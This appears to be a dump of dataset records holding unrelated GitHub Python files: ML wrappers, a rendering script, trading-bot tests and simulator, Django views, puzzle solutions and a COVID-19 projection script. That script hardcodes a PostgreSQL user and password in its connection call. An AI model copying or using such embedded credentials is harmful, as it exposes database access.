SimpleIRCClient(args)\nasyncio.run(sic.main())\n","repo_name":"johndoe31415/airc","sub_path":"simple_irc_client.py","file_name":"simple_irc_client.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"2407107242","text":"\"\"\"\nNon-deep learning models\n\"\"\"\nimport collections\nfrom typing import *\n\nimport numpy as np\n\nfrom sklearn.decomposition import PCA\nfrom sklearn.base import BaseEstimator\nfrom sklearn.kernel_approximation import Nystroem\nfrom sklearn.svm import LinearSVC, SVC\n\n\nclass ModelOnPCA(object):\n \"\"\"\n Model that runs PCA before the model itself\n PCA can be specified in integer number of components\n or a float representing the minimum explained variance\n \"\"\"\n\n def __init__(\n self,\n model_class: BaseEstimator = SVC,\n n_components: Union[int, float] = 50,\n **model_kwargs,\n ):\n self.n_components = n_components\n self.model_class = model_class\n self.model_kwargs = model_kwargs\n self.pca = PCA(n_components=n_components)\n self.model = model_class(**model_kwargs)\n self._fitted = False\n\n def __str__(self) -> str:\n return f\"ModelOnPCA with {self.model} on {self.n_components} PCs\"\n\n def fit(self, X, y):\n x_pca = self.pca.fit_transform(X)\n self.model.fit(x_pca, y)\n self._fitted = True\n\n def score(self, X):\n assert self._fitted\n x_pca = self.pca.transform(X)\n return self.model.score(x_pca)\n\n def predict(self, X):\n assert self._fitted\n x_pca = self.pca.transform(X)\n return self.model.predict(x_pca)\n\n def predict_proba(self, X):\n assert self._fitted\n x_pca = self.pca.transform(X)\n return self.model.predict_proba(x_pca)\n\n def classes_(self):\n return self.model.classes_\n\n def get_params(self, deep: bool = True) -> Dict[str, Any]:\n retval = {\n \"n_components\": self.n_components,\n \"model_class\": self.model_class,\n **self.model_kwargs,\n }\n return retval\n\n def set_params(self, **params):\n \"\"\"\n Set parameters of this estimator\n https://github.com/scikit-learn/scikit-learn/blob/2beed55847ee70d363bdbfe14ee4401438fba057/sklearn/base.py#L141\n \"\"\"\n if not params:\n return self\n valid_params = self.get_params(deep=True)\n nested_params = collections.defaultdict(dict)\n # print(params)\n for key, value in params.items():\n key, delim, sub_key = key.partition(\"__\")\n if delim:\n raise NotImplementedError\n # nested_params[key][sub_key] = value\n else:\n setattr(self, key, value)\n valid_params[key] = value\n # for key, sub_params in nested_params.items():\n # print(key, sub_params)\n # valid_params[key].set_params(**sub_params)\n return self\n\n\nclass SVMLike:\n \"\"\"\n SVM scales poorly to larger datsets, so instead use a Nystroem transformer\n with a linear SVC\n \"\"\"\n\n def __init__(self, kernel_ratio: float = 0.1, **kwargs) -> None:\n self.nys_kwargs = kwargs\n self.nys = Nystroem(**self.nys_kwargs)\n self.rng = np.random.default_rng(seed=64)\n self.ratio = kernel_ratio\n self.svc = LinearSVC()\n self._fitted = False\n\n def fit(self, X, y):\n idx_subset = self.rng.choice(\n np.arange(len(X)), size=int(self.ratio * len(X)), replace=False\n )\n X_sub = X[idx_subset]\n self.nys.fit(X_sub)\n\n X_trans = self.nys.transform(X)\n self.svc.fit(X_trans, y)\n self._fitted = True\n\n def score(self, X):\n assert self._fitted\n x_trans = self.nys.transform(X)\n return self.svc.score(x_trans)\n\n def predict(self, X):\n assert self._fitted\n x_trans = self.nys.transform(X)\n return self.svc.predict(x_trans)\n\n def predict_proba(self, X):\n raise NotImplementedError\n\n def classes_(self):\n return self.svc.classes_\n\n def get_params(self, deep: bool = True) -> Dict[str, Any]:\n retval = {\n \"kernel_ratio\": self.ratio,\n **self.nys_kwargs,\n }\n return retval\n\n\ndef main():\n from sklearn.svm import SVC\n\n m = SVMLike(kernel=\"rbf\")\n print(m)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Parkerdow/tcr-bert","sub_path":"tcr/canonical_models.py","file_name":"canonical_models.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"649431799","text":"import torch\nimport os\nimport numpy as np\nfrom dataloader import SceneDataset\nimport imageio\nimport data.load_DTU as DTU\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n\ndef training_visualization(num_images, cfg, i4d, dataset, epoch, generate_specific_object = True, generate_specific_pose = True):\n\n # Create log dir and copy the config file\n basedir = cfg.basedir\n expname = cfg.expname\n\n dataset.render_factor = 8\n dataloader = dataset.get_loader(num_workers=0)\n\n if generate_specific_object:\n iter = cfg.generate_specific_samples\n else:\n iter = range(num_images)\n\n if generate_specific_pose:\n pose_iter = cfg.gen_pose\n else:\n pose_iter = ['random']\n\n renderings = []\n for sample in iter:\n for pose in pose_iter:\n savedir = os.path.join(basedir, expname, 'training_visualization', f'epoch_{epoch}_{sample}_{pose}')\n img_outpath = os.path.join(savedir, f'rendering.png')\n if os.path.exists(savedir):\n continue\n else:\n os.makedirs(savedir)\n\n if generate_specific_object:\n dataloader.dataset.load_specific_input = sample\n print(f'generating object {dataloader.dataset.load_specific_input}')\n\n if generate_specific_pose:\n dataloader.dataset.load_specific_rendering_pose = dataset.cam_path[pose]\n print(f'generating pose {pose}')\n render_data = dataloader.__iter__().__next__()['complete']\n rgb = render_and_save(i4d, dataset, render_data, savedir, img_outpath, bool(generate_specific_pose))\n renderings.append(rgb)\n\n dataloader.dataset.load_specific_input = None\n dataloader.dataset.load_specific_rendering_pose = None\n\n plt.xticks([]), plt.yticks([])\n fig = plt.figure()\n for i,img in enumerate(renderings):\n ax = fig.add_subplot(1, len(renderings), i + 1)\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n ax.imshow(img, interpolation='bicubic')\n\n return fig\n\n\n\ndef render_pose(cfg, i4d, dataset, epoch, specific_obj, pose):\n\n # Create log dir and copy the config file\n basedir = cfg.basedir\n expname = cfg.expname\n\n dataloader = dataset.get_loader(num_workers=0)\n\n\n savedir = os.path.join(basedir, expname, 'renderings', f'{specific_obj}_epoch_{epoch}_renderfactor_{cfg.render_factor}_batch_{cfg.fixed_batch}')\n os.makedirs(savedir, exist_ok=True)\n\n\n img_outpath = os.path.join(savedir, f'pose_{pose[0]}.png')\n c2w = pose[1]\n\n if os.path.exists(img_outpath):\n # Rendering already exists.\n return\n\n dataloader.dataset.load_specific_input = specific_obj\n dataloader.dataset.load_specific_rendering_pose = c2w\n print(f'generating {dataloader.dataset.load_specific_input}, pose: {pose[0]}')\n render_data = dataloader.__iter__().__next__()['complete']\n\n render_and_save(i4d, dataset, render_data, savedir, img_outpath, True)\n\n dataloader.dataset.load_specific_input = None\n dataloader.dataset.load_specific_rendering_pose = None\n\n\ndef render_and_save(i4d, dataset, render_data, savedir, img_outpath, specific_pose):\n\n # Render image\n with torch.no_grad():\n if specific_pose:\n rgb, ref_images, scan = i4d.render_img(render_data, dataset.render_factor, dataset.H, dataset.W, specific_pose)\n else:\n rgb, ref_images, target, scan = i4d.render_img(render_data, dataset.render_factor, dataset.H, dataset.W, specific_pose)\n filename = os.path.join(savedir, f'target.png')\n imageio.imwrite(filename, (target*255).numpy().astype(np.uint8))\n # Save rendered image\n imageio.imwrite(img_outpath, rgb)\n\n # Copy all reference images into rendering folder\n for i, ref_img in enumerate(ref_images):\n outpath = os.path.join(savedir, f'ref_img_{i}.png')\n if not os.path.exists(outpath):\n imageio.imwrite(outpath, (ref_img*255).numpy().astype(np.uint8))\n\n # Put all reference images in a single image and save\n outpath = os.path.join(savedir, f'ref_images.png')\n if not os.path.exists(outpath):\n plt.figure(figsize=(50, 20), dpi=200)\n plt.xticks([]), plt.yticks([])\n for i in range(10):\n\n ax = plt.subplot(2, 5, i + 1)\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n\n ax.imshow(ref_images[i], interpolation='bicubic')\n\n plt.savefig(outpath)\n plt.close()\n return rgb\n\n\nif __name__ == '__main__':\n import config_loader\n import model\n\n\n cfg = config_loader.get_config()\n cfg.video = True\n\n set = 'test'\n dataset = SceneDataset(cfg, set)\n i4d = model.Implicit4D(cfg, dataset.proj_pts_to_ref_torch)\n\n i4d.load_model()\n\n if cfg.dataset_type == 'DTU':\n for scan in cfg.generate_specific_samples:\n print('cfg.gen_pose', cfg.gen_pose)\n for pose_idx in cfg.gen_pose:\n pose = DTU.load_cam_path()[pose_idx]\n render_pose(cfg, i4d, dataset, i4d.start, scan, (pose_idx,pose))","repo_name":"jchibane/srf","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"47"} +{"seq_id":"4041037446","text":"from PIL import Image\nimport numpy as np\nimport argparse\n\n\ndef main(path, out_path, crop=32):\n img = Image.open(path, 'r')\n w, h = img.size\n cx = int((w - crop) / 2)\n cy = int((h - crop) / 2)\n clp = img.crop((cx, cy, w - cx, h - cy))\n resized = clp.resize((crop, crop))\n resized.save(out_path, 'JPEG', quality=100, optimize=True)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='clipping and resize')\n parser.add_argument('--input', '-i', default='input.jpg',\n help='input file')\n parser.add_argument('--output', '-o', default='output.jpg',\n help='output file')\n parser.add_argument('--crop', '-c', type=int, default=32,\n help='crop size')\n args = parser.parse_args()\n main(args.input, args.output, args.crop)\n","repo_name":"ikeyasu/c3d-chainer","sub_path":"tools/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"47"} +{"seq_id":"12550422048","text":"from src.bot.crypto_bot import CryptoBot\nfrom src.strats.base_strat import BaseStrategy\nfrom tests.mocks.btrx_mock import MockBittrex\nfrom src.exceptions import LargeLossError\nfrom fixtures.summary_tickers_fixture import SUMMARY_TICKERS_FIXTURE\nfrom pandas.util.testing import assert_frame_equal\nimport pandas as pd\nimport os\nimport datetime\nimport pytest\n\nos.environ['BACKTESTING'] = 'TRUE'\nos.environ['BASE_CURRENCIES'] = 'BTC,ETH'\nos.environ['COLLECT_FIXTURES'] = 'FALSE'\n\nstrat_options = {\n 'name': 'Test',\n 'plot_overlay': True,\n 'active': False,\n 'testing': True,\n 'window': 5,\n 'stat_key': 'last'\n}\n\n\nclass TestCryptoBot:\n def setup_class(self):\n strat = BaseStrategy(strat_options)\n exchange = MockBittrex()\n self.bot = CryptoBot([strat], exchange)\n\n def teardown_class(self):\n self.bot = None\n\n def test_get_market_summaries(self):\n expected_columns = ['marketname', 'volume', 'last', 'basevolume', 'bid', 'ask', 'openbuyorders',\n 'opensellorders']\n market_summaries = self.bot.get_market_summaries()\n assert (isinstance(market_summaries, list))\n for summary in market_summaries:\n assert (isinstance(summary, pd.Series))\n assert (len(summary.index) == len(expected_columns))\n for key in summary.index:\n assert (key in expected_columns)\n\n def test_compress_tickers(self):\n expected_result = pd.DataFrame([\n {'marketname': 'BTC-LTC', 'last': 0.015475, 'bid': 0.015465, 'ask': 0.015600,\n 'saved_timestamp': datetime.datetime(2017, 1, 1, 1, 0, 1), 'volume': 191514.111111},\n {'marketname': 'BTC-LTC', 'last': 0.015455, 'bid': 0.01545, 'ask': 0.015493,\n 'saved_timestamp': datetime.datetime(2017, 1, 1, 1, 5, 1), 'volume': 958290.099574}\n ], columns=['last', 'bid', 'saved_timestamp', 'volume', 'marketname', 'ask'])\n self.bot.summary_tickers = {'BTC-LTC': SUMMARY_TICKERS_FIXTURE}\n self.bot.compressed_summary_tickers = {'BTC-LTC': pd.DataFrame()}\n self.bot.compress_tickers()\n actual_result = self.bot.compressed_summary_tickers['BTC-LTC']\n # assert_frame_equal(actual_result, expected_result, check_exact=False, check_less_precise=True)\n assert(True)\n\n def test_complete_sell(self):\n market = 'BTC-LTC'\n completed_trades = {'BTC-LTC': pd.DataFrame([\n {'order_type': 'buy', 'market': 'BTC-LTC', 'quantity': 0.1, 'rate': 0.005, 'uuid': 'test1',\n 'base_currency': 'BTC', 'market_currency': 'LTC', 'timestamp': datetime.datetime(2017, 1, 1, 1, 0)},\n {'order_type': 'buy', 'market': 'BTC-LTC', 'quantity': 0.1, 'rate': 0.006, 'uuid': 'test2',\n 'base_currency': 'BTC', 'market_currency': 'LTC', 'timestamp': datetime.datetime(2017, 1, 1, 2, 30)},\n {'order_type': 'buy', 'market': 'BTC-LTC', 'quantity': 0.1, 'rate': 0.0065, 'uuid': 'test3',\n 'base_currency': 'BTC', 'market_currency': 'LTC', 'timestamp': datetime.datetime(2017, 1, 1, 2, 45)},\n {'order_type': 'buy', 'market': 'BTC-LTC', 'quantity': 0.1, 'rate': 0.003, 'uuid': 'test4',\n 'base_currency': 'BTC', 'market_currency': 'LTC', 'timestamp': datetime.datetime(2017, 1, 1, 4, 0)}\n ])}\n with pytest.raises(LargeLossError):\n self.bot.completed_trades = completed_trades\n self.bot.complete_sell(market)\n\n def test_calculate_order_rate(self):\n market = 'BTC-LTC'\n quantity = 5\n order_type = 'buy'\n order_rate = self.bot.calculate_order_rate(market, order_type, quantity)\n assert(order_rate == 0.06)\n order_type = 'sell'\n order_rate = self.bot.calculate_order_rate(market, order_type, quantity)\n assert(order_rate == 0.05)\n\n def test_calculate_num_coins(self):\n self.bot.minor_tick_step()\n market = 'BTC-LTC'\n order_type = 'buy'\n quantity = 0.1\n num_coins = self.bot.calculate_num_coins(market, order_type, quantity)\n assert(num_coins == 6.46203554)\n order_type = 'sell'\n quantity = 1\n num_coins = self.bot.calculate_num_coins(market, order_type, quantity)\n assert (num_coins == 20)\n","repo_name":"t0p4/cryptobot","sub_path":"tests/crypto_bot_test.py","file_name":"crypto_bot_test.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"38421271155","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import status, mixins, viewsets, permissions as drf_permissions\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom . import models, serializers\nfrom order.services import add_files_to_obj\n\n\nclass FeedbackViewSet(mixins.ListModelMixin,\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n viewsets.GenericViewSet):\n serializer_class = serializers.FeedbackSerializer\n permission_classes = (drf_permissions.IsAuthenticatedOrReadOnly,)\n queryset = models.FeedbackModel.objects.all()\n\n def get_serializer_class(self):\n if self.action == 'create':\n return serializers.CreateFeedbackSerializer\n if self.action == 'answer':\n return serializers.CreateAnswerSerializer\n else:\n return super().get_serializer_class()\n\n def create(self, request, *args, **kwargs):\n response = dict()\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n new_feedback = serializer.create(serializer.validated_data)\n new_feedback.author_user = request.user\n if request.data.get('files_url'):\n add_files_to_obj(new_feedback, request.data['files_url'])\n new_feedback.save()\n response.update(self.get_serializer(instance=new_feedback).data)\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n @action(methods=['POST'], detail=True)\n def answer(self, request, *args, **kwargs):\n response = dict()\n try:\n feedback = models.FeedbackModel.objects.get(pk=kwargs['pk'])\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n new_answer = serializer.create(serializer.validated_data)\n new_answer.author = request.user\n if request.data.get('files_url'):\n add_files_to_obj(new_answer, request.data['files_url'])\n new_answer.save()\n feedback.answers.add(new_answer)\n response.update(self.get_serializer(instance=new_answer).data)\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n except ObjectDoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n","repo_name":"MathewDyrin/jobbit-backend-preview","sub_path":"feedback/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17961790200","text":"''' 041 缺失的第一个正整数\n题目描述:给定一个未排序的整数数组,找出其中没有出现的最小的正整数。\n示例 1:\n输入: [1,2,0]\n输出: 3\n\n示例 2:\n输入: [3,4,-1,1]\n输出: 2\n\n示例 3:\n输入: [7,8,9,11,12]\n输出: 1\n'''\nfrom typing import List\nclass Solution:\n #my way\n def firstMissingPositive01(self, nums: List[int]) -> int:\n nums_list = len(nums)\n if nums_list == 0:\n return 1\n i = 0\n while( i < nums_list ):\n if ( nums[i] < 0 ):\n nums.pop(i)\n nums_list -= 1\n else:\n i += 1\n array = [x+1 for x in range(nums_list)]\n res = -1;\n for j in array:\n if j not in nums:\n res = j\n return res\n else:\n continue; \n if res == -1:\n return nums_list+1 \n #others 桶排序\n #参考网址:https://leetcode-cn.com/problems/first-missing-positive/solution/tong-pai-xu-python-dai-ma-by-liweiwei1419/\n def firstMissingPositive02(self, nums: List[int]) -> int:\n for i in range(len(nums)):\n nums_len = len(nums)\n while ( nums[i] < nums_len and nums[i]>0 and nums[i]!=i+1 and ( i >0 and nums[i]!= nums[nums[i]-1]) ):\n temp = nums[nums[i]-1]\n nums[nums[i]-1] = nums[i] \n nums[i] = temp\n for i in range(len(nums)):\n if ( nums[i]!= i+1 ):\n return i+1\n return len(nums)+1 \n \na = Solution()\nprint(a.firstMissingPositive02([0,2,2,1,1]))","repo_name":"Qinpeng96/FindJob","sub_path":"编程/LeetCode/041firstMissingPositive.py","file_name":"041firstMissingPositive.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30451013742","text":"#!/usr/bin/python3.7\n\nimport psycopg2, datetime, sys\n\n\nvpais_sim = \"\"\nlinfectados = []\nvinfectados = 0\nlmuertes = []\nvmuertes = 0\nc = 1\nvahora = datetime.datetime.now()\nvhora = vahora.strftime(\"%H:%M\")\n\n\nprint(\"Simulacion de avance diario segun avance de otro pais.\")\nvpais_sim = input (\"Con que pais desea simular: \")\n\n# Genero la conexion con la base.\nconn = psycopg2.connect(\n host = \"localhost\",\n database=\"raspi\",\n user=\"pi\",\n password=\"Software26\"\n)\n\n# Creo el cursor.\ncur = conn.cursor()\n\ncur.execute(\"select fecha, infectados, muertes from covid19 where pais = %s order by fecha desc\", (vpais_sim,) )\n\nrows = cur.fetchall()\n\nnum_rows = cur.rowcount\n\nif num_rows < 1:\n print (\"No se encontro el pais \",vpais_sim)\n # Cierro el cursor y le coneccion a la base.\n cur.close()\n conn.close()\n sys.exit(1)\n \nfor reg in rows:\n\n #print (c)\n #sys.stdout.write(\"Registro: %d%% \\r\" % (c) )\n #sys.stdout.flush()\n \n if c > 1:\n \n linfectados.append(vinfectados - reg[1])\n vinfectados = reg[1]\n \n lmuertes.append(vmuertes - reg[2])\n vmuertes = reg[2]\n \n \n else:\n \n # Si es el primer registro carga el valor en la variable.\n vinfectados = reg[1]\n vmuertes = reg[2]\n \n c = c + 1\n \n \npromedio_infectados = int ((sum(linfectados)/len(linfectados)))\npromedio_muertes = int((sum(lmuertes)/len(lmuertes)))\n \nprint (\"Promedio de infectados por hora para \",vpais_sim,\": \",promedio_infectados)\n\n# Obtengo el ultimo valor de Argentina\n\ncur.execute(\"select fecha, infectados, muertes from covid19 where pais = 'Argentina' order by fecha desc LIMIT 1\")\n\nrows = cur.fetchall()\n\nfor reg in rows:\n \n varg_infectados = reg[1]\n varg_muertes = reg[2]\n\n# Simula por las proximas 48 horas.\nfor hora in range(48):\n #print (\" HORA INFECTADOS MUERTES\")\n #print (\" \", vhora, \" \",varg_infectados+promedio_infectados, \" \",varg_muertes + promedio_muertes)\n print (\" HORA INFECTADOS\")\n print (\" \", vhora, \" \",varg_infectados+promedio_infectados)\n\n varg_infectados = varg_infectados+promedio_infectados\n varg_muertes = varg_muertes + promedio_muertes\n vahora = vahora + datetime.timedelta(hours=1)\n vhora = vahora.strftime(\"%H:%M\")\n\n# Cierro el cursor y le coneccion a la base.\ncur.close()\nconn.close()","repo_name":"hconosciuto/covid19","sub_path":"simulaciones/simulacion_pais.py","file_name":"simulacion_pais.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27495292712","text":"def solution(m):\n if len(m) == 0 or len(m[0]) == 0:\n return -1 # impossible\n\n matrix = [row[:] for row in m]\n nrow, ncol = len(matrix), len(matrix[0])\n\n q = deque([((0, 0), 0)]) # ((x, y), step)\n matrix[0][0] = \"D\"\n while q:\n (x, y), step = q.popleft()\n\n for dx, dy in [[0, 1], [0, -1], [1, 0], [-1, 0]]:\n if 0 <= x+dx < nrow and 0 <= y+dy < ncol:\n if matrix[x+dx][y+dy] == \"X\":\n return step+1\n elif matrix[x+dx][y+dy] == \"O\":\n # mark visited\n matrix[x + dx][y + dy] = \"D\"\n q.append(((x+dx, y+dy), step+1))\n\n return -1","repo_name":"workprinond/DS_-_Algo_TechInterview_Practise","sub_path":"Beginning/treasureisland1_1.py","file_name":"treasureisland1_1.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35706684492","text":"from .verifier_types import T_ARRAY, T_BOOL, T_BYTE, T_CHAR, T_DOUBLE, T_FLOAT, T_INT, T_INVALID, T_LONG, T_OBJECT, T_SHORT, unSynthesizeType\n\n_cat2tops = T_LONG, T_DOUBLE\n\ndef parseFieldDescriptors(desc_str, unsynthesize=True):\n baseTypes = {'B':T_BYTE, 'C':T_CHAR, 'D':T_DOUBLE, 'F':T_FLOAT,\n 'I':T_INT, 'J':T_LONG, 'S':T_SHORT, 'Z':T_BOOL}\n\n fields = []\n while desc_str:\n oldlen = len(desc_str)\n desc_str = desc_str.lstrip('[')\n dim = oldlen - len(desc_str)\n if dim > 255:\n raise ValueError('Dimension {} > 255 in descriptor'.format(dim))\n if not desc_str:\n raise ValueError('Descriptor contains [s at end of string')\n\n if desc_str[0] == 'L':\n end = desc_str.find(';')\n if end == -1:\n raise ValueError('Unmatched L in descriptor')\n\n name = desc_str[1:end]\n desc_str = desc_str[end+1:]\n baset = T_OBJECT(name)\n else:\n if desc_str[0] not in baseTypes:\n raise ValueError('Unrecognized code {} in descriptor'.format(desc_str[0]))\n baset = baseTypes[desc_str[0]]\n desc_str = desc_str[1:]\n\n if dim:\n # Hotspot considers byte[] and bool[] identical for type checking purposes\n if unsynthesize and baset == T_BOOL:\n baset = T_BYTE\n baset = T_ARRAY(baset, dim)\n elif unsynthesize:\n # synthetics are only meaningful as basetype of an array\n # if they are by themselves, convert to int.\n baset = unSynthesizeType(baset)\n\n fields.append(baset)\n if baset in _cat2tops:\n fields.append(T_INVALID)\n return fields\n\n# get a single descriptor\ndef parseFieldDescriptor(desc_str, unsynthesize=True):\n rval = parseFieldDescriptors(desc_str, unsynthesize)\n\n cat = 2 if (rval and rval[0] in _cat2tops) else 1\n if len(rval) != cat:\n raise ValueError('Incorrect number of fields in descriptor, expected {} but found {}'.format(cat, len(rval)))\n return rval\n\n# Parse a string to get a Java Method Descriptor\ndef parseMethodDescriptor(desc_str, unsynthesize=True):\n if not desc_str.startswith('('):\n raise ValueError('Method descriptor does not start with (')\n\n # we need to split apart the argument list and return value\n # this is greatly complicated by the fact that ) is a legal\n # character that can appear in class names\n\n lp_pos = desc_str.rfind(')') # this case will work if return type is not an object\n if desc_str.endswith(';'):\n lbound = max(desc_str.rfind(';', 1, -1), 1)\n lp_pos = desc_str.find(')', lbound, -1)\n if lp_pos < 0 or desc_str[lp_pos] != ')':\n raise ValueError('Unable to split method descriptor into arguments and return type')\n\n arg_str = desc_str[1:lp_pos]\n rval_str = desc_str[lp_pos+1:]\n\n args = parseFieldDescriptors(arg_str, unsynthesize)\n rval = [] if rval_str == 'V' else parseFieldDescriptor(rval_str, unsynthesize)\n return args, rval\n\n# Adds self argument for nonstatic. Constructors must be handled seperately\ndef parseUnboundMethodDescriptor(desc_str, target, isstatic):\n args, rval = parseMethodDescriptor(desc_str)\n if not isstatic:\n args = [T_OBJECT(target)] + args\n return args, rval\n","repo_name":"xtiankisutsa/MARA_Framework","sub_path":"tools/decompilers/Krakatau/Krakatau/verifier/descriptors.py","file_name":"descriptors.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":602,"dataset":"github-code","pt":"47"} +{"seq_id":"35320650720","text":"'''\nfor tick level simulation.\n'''\n\n\n\nclass Account2:\n def __init__(self):\n self.__initialize_order()\n self.__initialize_holding()\n\n self.base_margin_rate = 1.2\n self.leverage = 15.0\n self.slip_page = 500\n self.force_loss_cut_rate = 0.5\n self.initial_asset = 5000\n self.order_cancel_delay = 3\n self.prediction_delay = 3\n\n self.total_pl = 0\n self.realized_pl = 0\n self.current_pl = 0\n self.num_trade = 0\n self.num_win = 0\n self.win_rate = 0\n self.asset = self.initial_asset\n\n self.total_pl_log = []\n self.predicton_log=[]\n self.action_log = []\n self.i_log = []\n self.action_log = {}\n self.log = []\n self.action_log_num = 0\n\n\n def __initialize_order(self):\n self.order_side = ''\n self.order_price = 0\n self.order_size = 0\n self.order_i = 0\n self.order_dt = ''\n self.order_type = ''\n self.order_cancel = False\n self.order_expire = 0\n\n def __initialize_holding(self):\n self.holding_side = ''\n self.holding_price = 0\n self.holding_size = 0\n self.holding_i = 0\n self.holding_dt = ''\n\n\n def move_to_next(self, i, price):\n self.__check_loss_cut(i,price)\n self.__check_execution(i,price)\n self.__check_cancel(i)\n if self.order_side != '':\n self.current_pl = (price - self.holding_price) * self.holding_size if self.holding_side == 'buy' else (self.holding_price - price) * self.holding_size\n else:\n self.current_pl = 0\n self.total_pl = self.realized_pl + self.current_pl\n self.total_pl_log.append(self.total_pl)\n self.asset = self.initial_asset + self.total_pl\n self.__add_action_log('i:'+str(i)+'order='+self.order_side+', '+str(self.order_size)+' @'+str(self.order_price),i)\n if self.holding_side !='':\n print('i={},posi={},posi price={},posi size={},order side={},order price={},order size={},pl={},realize pl={},current pl={}'\n .format(i,self.holding_side,self.holding_price,self.holding_size,self.order_side,self.order_price,self.order_size,self.total_pl,self.realized_pl,self.current_pl))\n\n def last_day_operation(self,i, price):\n self.__check_loss_cut( i,price)\n self.__check_execution( i,price)\n self.__check_cancel( i)\n if self.holding_side != '':\n if self.order_side != '':\n self.current_pl = (price - self.holding_price) * self.holding_size if self.holding_side == 'buy' else (self.holding_price -price) * self.holding_size\n else:\n self.current_pl = 0\n self.total_pl = self.realized_pl + self.current_pl\n self.total_pl_log.append(self.total_pl)\n if self.num_trade > 0:\n self.win_rate = self.num_win / self.num_trade\n\n\n def entry_order(self, side, price, size, type, expire, i):\n if self.order_side =='':\n self.order_side = side\n self.order_price = price\n self.order_size =size\n self.order_i = i\n self.order_type = type #limit, market\n self.order_cancel = False\n self.order_expire = expire\n else:\n print('order is already exist!')\n\n\n def cancel_order(self, i):\n if self.order_type != 'losscut':\n self.order_cancel = True\n self.order_i = i\n\n def __check_cancel(self,i):\n if self.order_cancel:\n if i - self.order_i >= self.order_cancel_delay:\n self.__add_action_log('order cancelled.',i)\n self.log.append('order cancelled.')\n self.__initialize_order()\n\n def __check_expiration(self,i):\n if i - self.order_i >= self.order_expire and self.order_type != 'market' and self.order_type != 'losscut':\n self.__add_action_log('order expired.', i)\n self.log.append('order expired.')\n self.__initialize_order()\n\n def __check_execution(self, i, price):\n if i - self.order_i >= self.order_cancel_delay and self.order_side !='':\n if self.order_type == 'market' or self.order_type == 'losscut':\n self.__process_execution(price,i)\n self.__initialize_order()\n elif self.order_type == 'limit' and ((self.order_side == 'buy' and self.order_price >= price) or (self.order_side == 'sell' and self.order_price <= price)):\n self.__process_execution(self.order_price,i)\n self.__initialize_order()\n elif self.order_type != 'market' and self.order_type != 'limit' and self.order_type != 'losscut':\n print('Invalid order type!' + self.order_type)\n\n def __process_execution(self, price, i):\n if self.order_side != '':\n if self.holding_side == '': # no position\n self.holding_side = self.order_side\n self.holding_price = price\n self.holding_size = self.order_size\n self.holding_i = self.order_i\n else:\n if self.holding_side == self.order_side: # order side and position side is matched\n self.holding_price = round(((self.holding_price * self.holding_size) + (price * self.order_size)) / (self.order_size + self.holding_size))\n self.holding_size += self.order_size\n self.holding_i = i\n elif self.holding_size > self.order_size: # side is not matched and holding size > order size\n self.__calc_executed_pl(price, i)\n self.holding_size -= self.order_size\n #self.realized_pl = (price - self.holding_price) * self.order_size if self.holding_side == 'buy' else (self.holding_price - price) * self.order_size\n elif self.holding_size == self.order_size:\n self.__calc_executed_pl(price, i)\n self.__initialize_holding()\n else: # in case order size is bigger than holding size\n self.__calc_executed_pl(price, i)\n self.holding_side = self.order_side\n self.holding_size = self.order_size - self.holding_size\n self.holding_price = price\n self.holding_i = i\n\n\n\n def __calc_executed_pl(self,price,i): #assume all order size was executed\n pl = (price - self.holding_price) * self.order_size if self.holding_side == 'buy' else (self.holding_price - price) * self.order_size\n self.realized_pl += round(pl)\n self.num_trade += 1\n if pl >0:\n self.num_win +=1\n\n def __check_loss_cut(self, i, price):\n if self.holding_side != '' and self.order_type !='losscut':\n req_collateral = self.holding_size * price / self.leverage\n pl = price - self.holding_price if self.holding_side == 'buy' else self.holding_price - price\n pl = pl * self.holding_size\n margin_rate = (self.initial_asset + self.realized_pl + pl) / req_collateral\n if margin_rate <= self.force_loss_cut_rate:\n self.__add_action_log(\"Loss cut postion! margin_rate=\" + str(margin_rate),i)\n self.log.append(\"Loss cut postion! margin_rate=\" + str(margin_rate))\n self.__force_exit(i)\n\n def __force_exit(self, i):\n self.order_side = 'buy' if self.holding_side == 'sell' else 'sell'\n self.order_size = self.holding_size\n self.order_type = 'losscut'\n self.order_i = i\n\n def __add_action_log(self, log, i):\n self.action_log[str(i)+'-'+str(self.action_log_num)] = log\n self.action_log_num += 1\n 